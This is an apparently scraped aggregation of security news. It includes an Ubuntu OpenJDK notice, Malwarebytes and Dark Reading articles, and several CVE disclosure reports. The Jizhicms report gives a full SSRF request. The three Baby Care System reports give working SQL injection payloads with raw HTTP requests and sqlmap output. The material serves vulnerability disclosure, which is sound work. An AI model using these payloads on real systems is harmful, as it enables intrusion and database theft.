Ubuntu Security Notice 5388-1 - It was discovered that OpenJDK incorrectly limited memory when compiling a specially crafted XPath expression. An attacker could possibly use this issue to cause a denial of service. It was discovered that OpenJDK incorrectly handled converting certain object arguments into their textual representations. An attacker could possibly use this issue to cause a denial of service. It was discovered that OpenJDK incorrectly validated the encoded length of certain object identifiers. An attacker could possibly use this issue to cause a denial of service.

`==========================================================================   Ubuntu Security Notice USN-5388-1   April 26, 2022  openjdk-lts vulnerabilities   ==========================================================================  A security issue affects these releases of Ubuntu and its derivatives:  - Ubuntu 22.04 LTS   - Ubuntu 21.10   - Ubuntu 20.04 LTS   - Ubuntu 18.04 LTS  Summary:  Several security issues were fixed in OpenJDK.  Software Description:   - openjdk-lts: Open Source Java implementation  Details:  It was discovered that OpenJDK incorrectly limited memory when compiling a   specially crafted XPath expression. An attacker could possibly use this   issue to cause a denial of service. (CVE-2022-21426)  It was discovered that OpenJDK incorrectly handled converting certain   object arguments into their textual representations. An attacker could   possibly use this issue to cause a denial of service. (CVE-2022-21434)  It was discovered that OpenJDK incorrectly validated the encoded length of   certain object identifiers. An attacker could possibly use this issue to   cause a denial of service. (CVE-2022-21443)  It was discovered that OpenJDK incorrectly validated certain paths. An   attacker could possibly use this issue to bypass the secure validation   feature and expose sensitive information in XML files. (CVE-2022-21476)  It was discovered that OpenJDK incorrectly parsed certain URI strings. An   attacker could possibly use this issue to make applications accept   invalid of malformed URI strings. (CVE-2022-21496)  Update instructions:  The problem can be corrected by updating your system to the following   package versions:  Ubuntu 22.04 LTS:   openjdk-11-jdk 11.0.15+10-0ubuntu0.22.04.1   openjdk-11-jdk-headless 11.0.15+10-0ubuntu0.22.04.1   openjdk-11-jre 11.0.15+10-0ubuntu0.22.04.1   openjdk-11-jre-headless 11.0.15+10-0ubuntu0.22.04.1   openjdk-11-jre-zero 11.0.15+10-0ubuntu0.22.04.1  Ubuntu 21.10:   openjdk-11-jdk 11.0.15+10-0ubuntu0.21.10.1   openjdk-11-jdk-headless 11.0.15+10-0ubuntu0.21.10.1   openjdk-11-jre 11.0.15+10-0ubuntu0.21.10.1   openjdk-11-jre-headless 11.0.15+10-0ubuntu0.21.10.1   openjdk-11-jre-zero 11.0.15+10-0ubuntu0.21.10.1  Ubuntu 20.04 LTS:   openjdk-11-jdk 11.0.15+10-0ubuntu0.20.04.1   openjdk-11-jdk-headless 11.0.15+10-0ubuntu0.20.04.1   openjdk-11-jre 11.0.15+10-0ubuntu0.20.04.1   openjdk-11-jre-headless 11.0.15+10-0ubuntu0.20.04.1   openjdk-11-jre-zero 11.0.15+10-0ubuntu0.20.04.1  Ubuntu 18.04 LTS:   openjdk-11-jdk 11.0.15+10-0ubuntu0.18.04.1   openjdk-11-jdk-headless 11.0.15+10-0ubuntu0.18.04.1   openjdk-11-jre 11.0.15+10-0ubuntu0.18.04.1   openjdk-11-jre-headless 11.0.15+10-0ubuntu0.18.04.1   openjdk-11-jre-zero 11.0.15+10-0ubuntu0.18.04.1  This update uses a new upstream release, which includes additional bug   fixes. After a standard system update you need to restart any Java   applications or applets to make all the necessary changes.  References:   https://ubuntu.com/security/notices/USN-5388-1   CVE-2022-21426, CVE-2022-21434, CVE-2022-21443, CVE-2022-21476,   CVE-2022-21496  Package Information:   https://launchpad.net/ubuntu/+source/openjdk-lts/11.0.15+10-0ubuntu0.22.04.1   https://launchpad.net/ubuntu/+source/openjdk-lts/11.0.15+10-0ubuntu0.21.10.1   https://launchpad.net/ubuntu/+source/openjdk-lts/11.0.15+10-0ubuntu0.20.04.1   https://launchpad.net/ubuntu/+source/openjdk-lts/11.0.15+10-0ubuntu0.18.04.1  `

Ubuntu Security Notice USN-5388-1

Today on Lock and Code, we speak with returning guest Tanya Janca about why so much of our software comes packaged with vulnerabilities.
The post Why our software has so many vulnerabilities, with Tanya Janca: Lock and Code S03E09 appeared first on Malwarebytes Labs.

Less than one year ago, the worst ransomware attack in history struck dozens of organizations. Threat actors had exploited a serious flaw in the remote monitoring and management tool Kaseya VSA that, when discussed on the Lock and Code podcast, was revealed to be “not advanced at all.”

This was far from the only software vulnerability that the public learned about last year.

When Lock and Code discussed the efforts by agricultural companies to turn their physical equipment, like tractors and combines, into smart devices, we learned about simple flaws that allowed a group of hackers to uncover user IDs for pretty much every registered device in a company’s database. And we learned that the IDs could, through a simple comparison search with the Fortune 500, reveal what companies were clients of that agricultural company.

And when we discussed the famous app Clubhouse, we learned about an eavesdropping flaw that was discovered with no technical hacking requirements—all that was necessary was two iPhones.

These examples and many, many more throughout cyber-history beg the question: What is going on with how our applications are developed?

Today on the Lock and Code podcast with host David Ruiz, we speak to returning guest Tanya Janca to understand the many stages of software development and how security trainers can better work with developers to build safe, secure products. According to Janca, a good security team takes the security of their developers’ products as their own responsibility.

> “It’s our job to help them make their software secure. If at the end, they have all these things wrong, guess what, it’s because our team, the security team, is not doing a good job”
> 
> Tanya Janca, Director of developer relations of Bright, founder of the online training academy We Hack Purple and author of Alice and Bob Learn Application Security.

Tune in to hear all this and more on this week’s Lock and Code podcast by Malwarebytes Labs.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Why our software has so many vulnerabilities, with Tanya Janca: Lock and Code S03E09

Apple will soon be rolling out its promised child safety features in the Messages app for users in Australia, Canada, New Zealand, and the UK
The post Apple’s child safety features are coming to a Messages app near you appeared first on Malwarebytes Labs.

![Apple’s child safety features are coming to a Messages app near you](https://blog.malwarebytes.com/wp-content/uploads/2022/04/GettyImages-1200217290-900x506.jpg)

Posted: April 25, 2022 by

Apple will soon be rolling out its promised child safety features in the Messages app for users in Australia, Canada, New Zealand, and the UK. The announcement comes four months after the features’ initial launch in the US on the iOS, iPad, and macOS devices.

To make communicating with Messages safer for Apple’s youngest users in the countries getting the rollout, it will start using machine learning to scan messages sent to and from an Apple device, looking for nudity to blur. Because scanning is done on-device, meaning the images are analyzed by the phone rather than in the Cloud, end-to-end encryption is not compromised.

“Messages analyses image attachments and determines if a photo contains nudity, while maintaining the end-to-end encryption of the messages,” Apple said in a statement. “The feature is designed so that no indication of the detection of nudity ever leaves the device. Apple does not get access to the messages, and no notifications are sent to the parent or anyone else.”

Of course, parents would have to enable this feature on their child’s iPhones first.

![](https://blog.malwarebytes.com/wp-content/uploads/2022/04/apple-child_safety-600x378.jpg)

Children are given the power to make a safe choice with what they want to see and do on Messages. (Source: Apple)

If the setting for this feature is on and a child receives a nude photo, Messages blurs it, warns the child of sensitive content, and points them to resources supported by child safety groups. If the child is about to send nude photos, the feature flags the picture and encourages them not to send the image. They could also talk to an adult they trust using the “Message a Grown-Up” button.

Note that the AI does not scan photos your child keeps in their Photo Library.

There have been some changes to these features since they were initially reported in August last year. Originally parents were also alerted if their young child (a child under 13) sent or received images that contained nudity. Privacy advocates and critics quickly pointed out that doing this could out queer kids to their parents, which could expose them to harm.

Apple is also delaying the rollout of an AI component that can scan photos in iCloud and compare them to a child sexual abuse material (CSAM) database. The company has yet to announce the date of this component’s release.

According to The Guardian, Apple will also introduce features that will kick in when users search for child exploitation content in Spotlight, Siri, and Safari.

**How to enable Apple’s safety features**

Parents/Carers/Guardians, you need to set up Apple’s Screen Time feature on your child’s phone first, which requires Family Sharing (If you haven’t done that already, go to the Set up Family Sharing help page for the steps).

Once you have Screen Time enabled and the communications safety features are already available in your country, please do the following:

1.  On your Apple device, open **Settings**.
2.  Choose **Screen Time**.
3.  Swipe down and choose your child’s device.
4.  Choose **Communications Safety**.
5.  Toggle **Check for Sensitive Photo**.

Stay safe!

**RELATED ARTICLES**

![“Your AppI‌e‌ ‌l‌D‌ ‌‌h‌‌a‌‌s‌‌ ‌‌b‌‌e‌‌e‌‌n‌‌ ‌‌l‌‌ocke‌‌d‌‌” spam email takes you on a website mystery tour](https://blog.malwarebytes.com/wp-content/uploads/2019/03/shutterstock_711671914-604x270.jpg)

April 14, 2022 - We take a look at what appears to be a phish, but ends up directing you to endless random websites instead.

![A week in security (March 28 – April 3)](https://blog.malwarebytes.com/wp-content/uploads/2018/01/shutterstock_610335074-604x270.jpg)

April 4, 2022 - The most important and interesting security stories from the last seven days.

![Update now! Apple patches two zero-day vulnerabilities that may have been actively exploited](https://blog.malwarebytes.com/wp-content/uploads/2021/06/patch_Apple-604x270.png)

April 1, 2022 - Apple released security updates for macOS Monterey 12.3.1, iOS 15.4.1, iPadOS 15.4.1, tvOS 15.4.1, and watchOS 8.5.1 patching 2 vulnerabilities that may have been exploited in the wild.

![De-Googling Carey Parker’s (and your) life: Lock and Code S03E06](https://blog.malwarebytes.com/wp-content/uploads/2021/12/Lock-and-Code-logo-2021-604x270.jpg)

March 14, 2022 - This week on Lock and Code, we talk about taking the right steps to removing Google and its many services from your life.

![Apple fixes Mac bug that could have allowed takeover of webcams and browser tabs](https://blog.malwarebytes.com/wp-content/uploads/2016/04/apple-mac-macbook-feature-604x270.jpg)

January 27, 2022 - A researcher discovered a way to gain control of both webcams and any open session in Safari. How did they do it?

Apple’s child safety features are coming to a Messages app near you

Jizhicms v1.9.5 was discovered to contain a Server-Side Request Forgery (SSRF) vulnerability via /admin.php/Plugins/update.html.

Thank you for your letter ! The Version 2.0 supports changing the plug-in address. If you want the system to download a file, you can forge an address and add your special file. You can download it directly without such complexity. The plug-in module itself has permission control. If you do not have background permission, you will not be able to download plug-ins. Thank you again for your suggestions, but I'm sorry that the plug-in function model does not require downloading the specified files, but wants to download any files that the administrator wants to download. This is the original intention of my plug-in design. Keeping the administrator account well will be everyone's responsibility. If you lose the background account, you will lose everything.

…

\------------------&nbsp;原始邮件&nbsp;------------------ 发件人: "Cherry-toto/jizhicms" \*\*\*@\*\*\*.\*\*\*&gt;; 发送时间:&nbsp;2022年3月18日(星期五) 晚上9:33 \*\*\*@\*\*\*.\*\*\*&gt;; \*\*\*@\*\*\*.\*\*\*&gt;; 主题:&nbsp;\[Cherry-toto/jizhicms\] V1.9.5: SSRF Vulnerability (Issue #67) SSRF vulnerability with echo exists in the CMS background, and attackers can use this vulnerability to scan local and Intranet ports and attack local and Intranet Jizhicms background. Attackers can use this vulnerability to scan local and Intranet ports, attack local and Intranet services, or carry out DOS attacks The vulnerability is located in the background plug-in download function I start a locally accessible Web service with a flag.php file 使用payload POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.48.135 Content-Length: 93 Accept: application/json, text/javascript, \*/\*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.48.135 Referer: http://192.168.48.135//admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=821f3d50fa8cd84139c76be9 Connection: close action=start-download&amp;filepath=mutisite&amp;download\_url=http%3a%2f%2f127.0.0.1%3a8888%2fflag.php See the response Browser accesshttp://192.168.48.135/cache/update\_mutisite.zip open by notepad As with flag.php, this was read successfully — Reply to this email directly, view it on GitHub, or unsubscribe. Triage notifications on the go with GitHub Mobile for iOS or Android. You are receiving this because you are subscribed to this thread.Message ID: \*\*\*@\*\*\*.\*\*\*&gt;

CVE-2022-27429: V1.9.5: SSRF Vulnerability · Issue #67 · Cherry-toto/jizhicms

element-plus 2.0.5 is vulnerable to Cross Site Scripting (XSS) via el-table-column.

Bug Type: **`Component`**

**Environment**

*   Vue Version: `3.2.13`
*   Element Plus Version: `2.0.5`
*   Browser / OS: `UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
*   Build Tool: `Vue CLI`

**Reproduction****Related Component**

*   `el-table-column`

**Reproduction Link**

Github Repo

**Steps to reproduce**

按照 复现项目的 readme 进行构建  
访问 serve  
在 含有 payload 的 address 的列处中划过光标 就可以触发 js 运行导致 xss

**What is Expected?**

渲染img或者不渲染都可以 但不可以执行 JavaScript

**What is actually happening?**

渲染文本内容为 html 并且执行 JavaScript 脚本

**Additional comments**

elementui plus 是一个大仓库导致有许许多多的前端项目依赖其而构建  
show-overflow-tooltip 已经可以通过 github 代码搜索 找到相关项目 并且其中包含一些部分后台管理项目  
建议通知开发者 更新项目与修复该问题  
此外文档中建议添加相关 安全警告

其他相关信息:  
asjdf/element-table-xss-test#1

Reporter:  
@Esonhugh  
@asjdf

CVE-2022-27103: [Bug Report] [Component] [table-column] table-column 中对于 属性 show-overflow-tooltip 处理存在问题 可以导致 XSS · Issue #6514 · element-plus/element-plus

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
If you pay attention to the video game community as much as I do, you’ve been closely following the ongoing legal battle between Apple and Epic over the sale of “Fortnite” on the Apple App Store. (I promise...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Source newsletter (April 21, 2022) — Sideloading apps is as safe as you make it

Ransomware and other financially motivated threat actors joined nation-state-backed groups in leveraging unpatched flaws in attack campaigns, new data shows.

Threat actors exploited more zero-day vulnerabilities in 2021 than any prior year and mostly in software from Microsoft, Google, and Apple.

State-backed advanced persistent threat actors remained the most prolific users of these exploits as has always been the case to date. However, they were not the only ones: financially motivated groups — particularly ransomware operators — sharply ramped up their use of zero-days and accounted for one in three of attackers exploiting these vulnerabilities.

Two separate advisories this week — one from Mandiant and the other from Google's Project Zero security team — identified a big jump last year in software flaws that threat actors exploited before a patch became available. Mandiant counted a total of 80 such flaws in 2021, while Google identified 58 zero-days that were exploited in the wild before being patched.

By Mandiant's count, the 80 zero-day exploits in 2021 represented a 167% increase over the 30 it logged in 2020, and it more than doubled the previous highest number of 32 in 2019. The 58 zero-day exploits that Google counted represented more than double the 25 that company observed in 2020. It was also more than double Google's highest-ever total of 28 zero-days back in 2015.

Vulnerabilities in Microsoft, Google, and Apple accounted for 75% of the zero-days that threat actors exploited last year — a number likely tied to the broad use and popularity of technologies from these three vendors, Mandiant said. A spreadsheet of zero-day flaws that Google has maintained since 2014 shows that 16 of the 58 zero-day exploits the company observed last year were in its own technologies; 21 involved Microsoft products; and 13 were in Apple products. The remaining vulnerabilities involved products from a total of nine other vendors including Qualcomm, Trend Micro, Sonic Wall, Accellion (now Kiteworks), and Pulse Secure, Mandiant said.

    

Source: Mandiant

The data underscores how organizations cannot ignore the potential for threat actors to hunt for and exploit zero-days in less widely used technologies, says James Sadowski, principal analyst at Mandiant.

"While popular vendors remain popular targets for zero-day exploitation, we've gradually seen expansion of both technologies and vendors targeted by zero-day exploitation outside of main vendors," he says.

"Like we observed in the exploitation of Accellion FTA, threat actors can exploit vulnerabilities in these systems and cause significant damage," Sadowski says, referring to a zero-day flaw in a near obsolete Accellion product that led to breaches at multiple large companies.

**Many Reasons Why**  
Mandiant identified multiple potential reasons for the explosion in threat actor use of zero-day exploits last year. The company perceived the increased enterprise adoption of cloud, mobile, and IoT technologies as increasing the volume of software that organizations are using and therefore resulting in the discovery of more bugs. The increase in the number of so-called exploit brokers trading in zero-day vulnerabilities has also been a factor, as have increased investments in research and development by zero-day exploits threat groups. Google, meanwhile, attributed the surge to improved detection and disclosure of zero-day bugs — a factor that Mandiant too said was likely at play.

The security vendor's analysis showed that state-sponsored groups — especially those from China — continue to dominate zero-day exploit use. But there was a noticeable increase in the number of ransomware and other financially motivated threat groups leveraging zero-days in their attacks.

Sadowski says these threat actors are likely acquiring zero-day exploits via underground exploit brokers and criminal service providers. Or they could be recruiting the requisite talent in-house to research vulnerabilities and develop zero-day exploits, as appeared to be the case with the Conti ransomware group — leaked Conti chat files showed the threat actors discussing recently disclosed vulnerabilities and assigning members to build a scanner to identify potentially vulnerable systems.

"As ransomware groups collect increasingly large sums from their operations, we have observed them more frequently employ zero-day exploits in their operations," Sadowski says. Generally, though, it is extremely difficult to identify where a threat actor might have acquired a zero-day exploit, he says.

Bud Broomhead, CEO at Viakoo, says the increased use of zero-day exploits shows that threat actors are shifting their attack vectors away from vulnerabilities that traditional threat assessment and detection solutions would uncover. "That's why not just zero-day threats, but also exploiting IoT vulnerabilities and leveraging open source software, are rapidly growing enterprise threats," he says. The challenge for organizations is figuring out how to limit damage from a successful zero-day breach and figuring out how to protect against exploits targeting new attack vectors.

The growing use of zero-days highlights the need for organizations to have rapid, out-of-band patching capabilities, says John Bambenek, principal threat hunter at Netenrich.

"Organizations need to remain flexible and agile getting these into production," he says. "Remove as many barriers as possible to patching, including streamlining testing and change management."

Zero-Day Exploit Use Exploded in 2021

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&action=edit.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&action=edit

Vulnerability location: /BabyCare/admin.php?id=posts&action=edit&postid=2 //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=edit&postid=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=edit&postid\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=posts&action\=edit&postid\=2' AND 7502=7502 AND 'Yurq'\='Yurq

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=posts&action\=edit&postid\=2' AND (SELECT 6867 FROM(SELECT COUNT(\*),CONCAT(0x7162786a71,(SELECT (ELT(6867=6867,1))),0x7170767071,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'huoz'\='huoz

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=edit&postid\=2' AND (SELECT 5804 FROM (SELECT(SLEEP(5)))ZBUN) AND 'nxGO'\='nxGO

    Type: UNION query
    Title: Generic UNION query (NULL) \- 8 columns
    Payload: id\=posts&action\=edit&postid\=\-9180' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162786a71,0x4e436b74735063624a4164484d4f675676736e68467951525141677146614f56476b524f66456f50,0x7170767071),NULL,NULL,NULL,NULL-- -
\---

CVE-2022-28422: bug_report/SQLi-3.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via BabyCare/admin.php?id=theme&setid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/theme.php

Vulnerability location: BabyCare/admin.php?id=theme&setid= //setid is Injection point

\[+\]Payload: setid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+ //setid is Injection point

GET /BabyCare/admin.php?id\=theme&setid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: setid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=theme&setid\=1' AND 4666=4666 AND 'rScZ'\='rScZ

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=theme&setid\=1' AND (SELECT 1518 FROM(SELECT COUNT(\*),CONCAT(0x7171707671,(SELECT (ELT(1518=1518,1))),0x7176717671,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'KBjM'\='KBjM

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=theme&setid\=1' AND (SELECT 8964 FROM (SELECT(SLEEP(5)))SZjt) AND 'pISR'\='pISR
\--\-

CVE-2022-28420: bug_report/SQLi-1.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin.php?id=posts&action=display&value=1&postid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/post.php 

Vulnerability location: /BabyCare/admin.php?id=posts&action=display&value=1&postid= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=display&value=1&postid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=display&value\=1&postid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&action\=display&value\=1&postid\=1' RLIKE (SELECT (CASE WHEN (5665=5665) THEN 1 ELSE 0x28 END))-- GiVX
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=posts&action=display&value=1&postid=1' AND (SELECT 7280 FROM(SELECT COUNT(\*),CONCAT(0x71627a7071,(SELECT (ELT(7280\=7280,1))),0x71787a6a71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- PXXk

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=display&value\=1&postid\=1' AND (SELECT 3574 FROM (SELECT(SLEEP(5)))SpIf)-- qCfa
\---

Tag

#apple